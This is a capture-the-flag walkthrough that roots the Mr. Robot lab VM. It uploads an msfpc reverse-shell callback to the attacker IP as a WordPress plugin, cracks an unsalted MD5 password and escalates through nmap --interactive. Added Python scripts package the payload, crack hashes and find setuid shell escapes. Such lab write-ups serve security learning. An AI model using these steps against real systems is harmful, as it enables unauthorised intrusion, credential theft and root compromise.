I have no knowledge of the target machine's (Mr. Robot) IP address, so I begin with an nmap scan of the network. Of course, you can use any other network discovery tool; I prefer nmap because it is already on my Kali pentest machine.

Ports 80 and 443 are the interesting ports to start poking at. Let's see what's on this website. I'm launching Firefox directly from the command prompt; of course, you can simply click the Firefox icon and enter the web server's IP address. It's cool to use the CLI to run a command.

root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/

The website loads a JavaScript animation that looks like a Linux terminal booting.

Opening the source code, I find this fancy "You are not alone".

Checking whether any of this information helps to hack the Mr. Robot box.

I have to cancel the directory scan; I think I have enough information to start digging. The dir results yield a lot: sub-folders such as /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. The wp-* paths tell me the Mr. Robot box website is running the WordPress content management system. Nice.

Checking the following sub-folder.

root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license

A page with this content: "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"

Checking the users: the "elliot" account is also an Administrator. Jackpot! There is another user, micho05654, with the Subscriber role. I will ignore the subscriber and focus on elliot as administrator.

Now I can control this box from here. Since I have Administrator rights on the WordPress CMS, I can exploit it to get a reverse shell: an administrator is allowed to upload and activate arbitrary PHP as a plugin. Let the Kali virtual machine do the work for us. Click Applications, Exploitation Tools, then MSF Payload. It opens the MSFVenom Payload Creator (msfpc) in a new terminal window. I run the command below.

root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp

This reads as: run msfpc to create a payload of type php that calls back to the attacker's IP address 192.168.159.131 on port 443; msf selects the Metasploit format for a cross-platform shell with the full power of Metasploit; reverse makes the target connect back to the attacker; stageless produces a complete stand-alone payload; tcp is the standard method of connecting back. I hope that makes sense to you; otherwise run msfpc --help for more details.

The MSFVenom Payload Creator also prints a one-liner for serving the payload over HTTP to a target, e.g. python -m SimpleHTTPServer 8080. In this scenario I will not use it, because I already have administrator access to the WordPress site: all I need to do is install my payload through WordPress as a plugin. At this point I could wreak havoc on the WordPress installation by deleting content, but the main goal is to own the box (pwn to root, or pwn 2 r00t).

I edit the PHP file, adding the WordPress plugin header comment (at minimum a Plugin Name: line) so WordPress accepts it as a plugin. Here's the updated PHP file.

The payload is now ready. I upload the zip file as a plugin through the WordPress management console. Back in the WordPress admin page, go to Plugins, click Add New, then Upload Plugin. Browse to the zip file, click Install Now and wait for the upload to complete.

I've already started the listener (above), so all I need to do is click Activate Plugin: WordPress executes the plugin's PHP on activation, which fires the reverse connection. When I check my listening machine, I see our session.
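What makes the plugin route work is that WordPress treats any PHP file whose first 8 KiB contain a Plugin Name: header comment as a plugin, and runs that file when it is activated. The script below is an added Python example, not code from the original post: it prepends that header to a payload file, strips the generator's own opening tag so the tag is not doubled, and packages the result as slug/slug.php in a zip, which is the layout the uploader expects. The payload text, plugin name and slug are constructed placeholders; the real file would be the msfpc output, and the "/*<?php /**/" prologue the script looks for is an assumption about what msfvenom's PHP payloads usually begin with.

```python
"""Wrap a PHP payload in the minimal WordPress plugin header and zip it.

Added example, not from the original post. SAMPLE_PAYLOAD is a constructed
placeholder standing in for the msfpc output; plugin name and slug are assumptions.
"""
import io
import zipfile

WP_HEADER_LIMIT = 8 * 1024   # WordPress scans only the first 8 KiB of a file for plugin headers

# Constructed placeholder: it only echoes a string. The real msfpc file would carry the
# reverse-shell code. Assumption: msfvenom PHP payloads start with the "/*<?php /**/" prologue.
SAMPLE_PAYLOAD = "/*<?php /**/ error_reporting(0); echo 'placeholder payload'; ?>"


def plugin_header(name, description="", version="1.0"):
    """Return the comment block WordPress parses; 'Plugin Name:' is the only mandatory key."""
    return (
        "/*\n"
        f"Plugin Name: {name}\n"
        f"Description: {description}\n"
        f"Version: {version}\n"
        "*/\n"
    )


def wrap_payload(payload, name, description=""):
    """Turn raw payload text into plugin source: one <?php tag, the header, then the payload body."""
    body = payload.lstrip()
    for prologue in ("/*<?php /**/", "<?php"):   # drop the generator's own opening tag
        if body.startswith(prologue):
            body = body[len(prologue):]
            break
    return "<?php\n" + plugin_header(name, description) + body.lstrip() + "\n"


def build_plugin_zip(payload, slug, name):
    """Return the bytes of a zip laid out as slug/slug.php, as the plugin uploader expects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", wrap_payload(payload, name))
    return buf.getvalue()


def inspect_plugin_zip(data):
    """Check an archive the way WordPress will: a .php member whose first 8 KiB carry 'Plugin Name:'."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        php = [n for n in names if n.endswith(".php")]
        if not php:
            return {"names": names, "plugin_file": None, "has_header": False}
        head = zf.read(php[0])[:WP_HEADER_LIMIT].decode("utf-8", "replace")
        return {"names": names, "plugin_file": php[0], "has_header": "Plugin Name:" in head}


if __name__ == "__main__":
    archive = build_plugin_zip(SAMPLE_PAYLOAD, "wp-revshell", "Example Plugin")   # assumed slug/name
    with open("wp-revshell.zip", "wb") as fh:
        fh.write(archive)
    print(inspect_plugin_zip(archive))
```

Run it with the real msfpc output in place of SAMPLE_PAYLOAD and upload the resulting zip; inspect_plugin_zip is the same sanity check to run before uploading, since a missing header makes WordPress reject the archive with "The package could not be installed. No valid plugins were found."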

The usage banner of the Metasploit sessions command, which manages the connection:

-K        Terminate all sessions
-c <opt>  Run a command on the session given with -i, or all
-h        Help banner
-i <opt>  Interact with the supplied session ID
-k <opt>  Terminate sessions by session ID and/or range
-l        List all active sessions
-q        Quiet mode
-r        Reset the ring buffer for the session given with -i, or all
-s <opt>  Run a script on the session given with -i, or all
-t <opt>  Set a response timeout (default: 15)
-u <opt>  Upgrade a shell to a meterpreter session on many platforms
-v        List sessions in verbose mode
-x        Show extended information in the session table

The line "robot:c3fcd3d76192e4007dfb496cca67e13b" is in username:hash form. I used an online MD5 lookup tool (hashkiller.co.uk) to resolve "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz" (MD5 is a hash, not encryption; such sites simply match the hash against precomputed lists of common passwords). Wow! The password is so basic. Had I run a password cracker against it earlier, I'm sure it would have found this password in under 2 minutes. Anyway, let me log in to the Mr. Robot box with this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
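The lookup site works because the hash is a plain, unsalted MD5: anyone can hash guesses and compare. As an added Python example (not from the post), here is that check done locally: parse the user:hash line, hash each word of a wordlist and stop at the first match. The wordlist is a constructed handful of entries; against a real target you would stream a file such as rockyou.txt through the same function.

```python
"""Recover a password from an unsalted MD5 with a wordlist.

Added example, not from the original post. CRED_LINE is the line the post found;
WORDLIST is a constructed stand-in for a real list such as rockyou.txt.
"""
import hashlib

CRED_LINE = "robot:c3fcd3d76192e4007dfb496cca67e13b"

# Constructed mini wordlist; a real run streams a file of millions of lines through crack_md5.
WORDLIST = [
    "password", "123456", "robot", "mrrobot", "fsociety", "elliot",
    "abcdefghijklmnopqrstuvwxyz", "qwertyuiop",
]


def parse_cred_line(line):
    """Split 'user:hexdigest' and reject anything that is not a 32-hex-digit MD5."""
    user, sep, digest = line.strip().partition(":")
    digest = digest.lower()
    if not sep or len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError(f"not a user:md5 line: {line!r}")
    return user, digest


def crack_md5(target_hex, candidates):
    """Return the first candidate whose MD5 equals target_hex, or None.

    Candidates may be str or bytes (wordlist files are read as bytes because
    rockyou-style lists are not valid UTF-8). Unsalted MD5 means one cheap hash
    per guess and no per-user salt, so a common-password list is exhausted in seconds.
    """
    target = bytes.fromhex(target_hex)
    for word in candidates:
        if isinstance(word, str):
            word = word.encode("utf-8")
        word = word.rstrip(b"\r\n")   # strip line endings only; other whitespace may be part of the password
        if hashlib.md5(word).digest() == target:
            return word.decode("utf-8", "replace")
    return None


def crack_file(target_hex, path):
    """Stream a wordlist file through crack_md5 without loading it into memory."""
    with open(path, "rb") as fh:
        return crack_md5(target_hex, fh)


if __name__ == "__main__":
    user, digest = parse_cred_line(CRED_LINE)
    print(user, crack_md5(digest, WORDLIST))
```

The same hash against a salted, slow KDF (bcrypt, scrypt, Argon2) would cost a separate, expensive computation per guess and per user, which is the property this file's storage format lacks.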

Successfully logged in as robot with abcdefghijklmnopqrstuvwxyz. Run ls to check the directory listing.

Run "cat key-2-of-3.txt" to view the file.

Check whether I can "ls /root".

Oops ... it seems I need more research to get root access.

After long hours of research and reading other penetration testing websites/blogs...

I checked the nmap version on the Mr. Robot box. Old nmap releases still have the --interactive mode, which runs a shell command when you type ! followed by the command (the flag was removed in later releases). This only escalates privileges if the nmap binary is setuid root; otherwise the shell it spawns is just another shell as robot.

I can use "nmap --interactive" and type !bash to run a shell.

No luck.

Now trying !sh, which spawns a shell. Type exit to leave it. (sh works where bash did not because bash, when started with an effective UID different from the real UID, drops the elevated privileges unless invoked with -p; sh does not.)
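The post does not say why nmap hands out a root shell; for nmap --interactive to escalate, the nmap binary must be setuid root, so the check to run right after getting the robot shell is a sweep for setuid binaries. The following is an added Python example, not from the post: it lists setuid files under the usual bin directories, matches them against a small table of known shell escapes (an assumption, containing only the nmap trick the post uses), and builds its own throwaway directory so it runs offline. The fake nmap in the demo is owned by the current user rather than root, which is why the demo passes its own UID as the expected owner.

```python
"""Hunt for setuid binaries before trying a shell escape such as nmap --interactive.

Added example, not from the original post. SHELL_ESCAPES is an assumption that
lists only the technique the post used; extend it for other binaries.
"""
import os
import stat
import tempfile

DEFAULT_ROOTS = ("/usr/local/bin", "/usr/local/sbin", "/usr/bin", "/usr/sbin", "/bin", "/sbin")

# Known shell escapes keyed by binary name (assumption: only the nmap trick from the post).
SHELL_ESCAPES = {
    "nmap": "nmap --interactive, then !sh (old releases only; --interactive was removed later)",
}


def find_setuid(roots=DEFAULT_ROOTS):
    """Return (path, owner_uid) for every regular file under roots with the setuid bit set.

    Equivalent to `find <roots> -perm -4000 -type f 2>/dev/null`: symlinks are skipped
    (the bit lives on the target) and unreadable directories are silently ignored.
    """
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    hits.append((path, st.st_uid))
    return hits


def escape_candidates(hits, owner=0):
    """Keep setuid files owned by `owner` (root on a real target) that have a known shell escape."""
    out = []
    for path, uid in hits:
        hint = SHELL_ESCAPES.get(os.path.basename(path))
        if uid == owner and hint:
            out.append((path, hint))
    return out


def demo():
    """Build a throwaway bin directory with a fake setuid 'nmap' and a normal 'ls', then sweep it.

    Returns (names_of_setuid_files, candidates). The files are constructed and owned by the
    current user, so the demo passes os.getuid() as the owner; on a target keep the default 0.
    """
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("nmap", 0o4755), ("ls", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")   # constructed stand-in, never executed
            os.chmod(path, mode)
        hits = find_setuid([tmp])
        names = sorted(os.path.basename(p) for p, _uid in hits)
        return names, escape_candidates(hits, owner=os.getuid())


if __name__ == "__main__":
    found = find_setuid()
    for path, uid in found:
        print(f"{uid:>5}  {path}")
    for path, hint in escape_candidates(found):
        print(f"candidate: {path} -> {hint}")
```

On the target, run it (or the equivalent find one-liner) as robot; a setuid-root nmap in the output is what turns "nmap --interactive" plus !sh into a root shell.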
